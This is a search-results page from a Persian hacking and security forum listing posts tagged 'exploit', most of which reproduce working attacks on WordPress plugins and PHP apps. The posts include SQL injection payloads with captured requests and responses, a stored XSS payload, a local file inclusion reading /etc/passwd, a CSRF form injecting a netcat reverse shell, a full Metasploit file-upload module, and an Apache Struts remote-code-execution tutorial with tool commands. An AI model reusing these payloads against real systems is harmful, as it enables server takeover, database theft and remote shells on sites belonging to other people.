رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'exploit'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

60 نتیجه پیدا شد

  1. Victory

    Hacking AdobeReader BLEND vulnerability Exploit

    https://www.mediafire.com/file/9gu0kcdnd2l5c19/01zx.zip/file فیلم اموزشی داخل فایل قرار دارد پسورد:anonysec.org
  2. Hack server with apache struts exploit Description After a while, we again saw a new and sensitive bug for Apache Struts A new vulnerability has been discovered for the Apache-Struts service, which is rce type (Remote File Include) This security hole is in versions 2, 3 to 2, 3, 34 | There are 2.5-5.2.5.16 And to update the server security, be sure to update it to the latest version This vulnerability can be used in a variety of ways, but in this tutorial, we introduce two tools that are easy to use. Hacking the server training using the first method Be careful at first. In the system you want to test the exploit, install Python 2 or 3, because the tool is written in Python. Download the tool from the download section at the bottom of the page. To download as a folder in your Linux, use the following command git clone link Then enter the downloaded folder with the following command, which is the main tool cd struts-pwn_CVE-2018-11776 To check the site that is vulnerable to this vulnerability, enter the address below as shown below python3 struts-pwn.py -url https://site.com/struts2-showcase/index.action If you want to check multiple websites at the same time, save them in a file and submit your file to the program as a list to be saved. python3 struts-pwn.py -list list-site.txt Use the following command to use this vulnerability: python3 struts-pwn.py -exploit -url 'https://site.com/struts2-showcase/index.action' -c id Server penetration testing through APAC Secondary Hacking Method Secondary Hacking Tool Another tool we introduce to use vulnerabilities with the following identifiers CVE-2013-2251 CVE-2017-5638 CVE-2018-11776 Hack iphone and ways to deal First download the tool from the download section git clone link Then enter the downloaded folder cd Apache-Struts-v3 Now run the tool with the following command python ApacheStruts.py Apache struts vulnerability tool After the tool is executed, it does not need to be used as a switch, and each option you want to use is in the toolbar The tool that was executed will enter the link of the site you want and run exploit if there is a vulnerability. You will have full access to the remote control and you can execute your commands on the site server Conclusion The second tool introduced is a relatively simpler way to hack the server, but the second tool gives you more options. Your choice depends on your type of work and to ensure security against this security hole, be sure to update all installed server packages. Download tools The first tool https://github.com/mazen160/struts-pwn_CVE-2018-11776.git Second tool https://github.com/s1kr10s/Apache-Struts-v3.git http://www.exploit4arab.org/exploits/2206
  3. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  4. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  5. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  6. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  7. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion # Author: Manuel Garcia Cardenas # Date: 2018-09-19 # Software link: https://es.wordpress.org/plugins/localize-my-post/ # CVE: 2018-16299 # DESCRIPTION # This bug was found in the file: /localize-my-post/ajax/include.php # include($_REQUEST['file']); # The parameter "file" it is not sanitized allowing include local files # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. # Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  8. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  9. # Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-24 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html # Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/user/chatroom.php?id=[SQL] # # [PATH]/user/chatroom.php # 03 <?php # 04 $id=$_REQUEST['id']; # 05 # 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'"); # 07 $chatrow=mysqli_fetch_array($chatq); GET /[PATH]/user/chatroom.php?id=-3%27雷�穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml왩,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 24 Oct 2018 20:44:14 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
  10. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  11. # Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-18 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.bookman.nl # Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] # function edit_rec() { # if (isset ($_GET['id'])) $in_id = $_GET['id']; # if ($_GET['mte_a'] == 'edit') $edit=1; # else $edit = 0; # $count_required = 0; # $rows = ''; # $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:34:58 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT Content-Length: 3642 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] # # function del_rec() { # $in_id = $_GET['id']; # if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { # $this->content_deleted = " GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:38:18 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT Content-Length: 1046 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
